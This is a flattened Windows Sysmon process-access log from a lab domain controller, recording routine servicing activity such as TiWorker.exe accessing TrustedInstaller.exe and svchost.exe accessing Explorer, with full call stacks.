C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.258{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.258{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.258{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.258{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.242{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.242{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.226{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.226{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.226{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.226{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.226{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.211{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.211{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.211{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.211{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.211{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.195{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.195{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
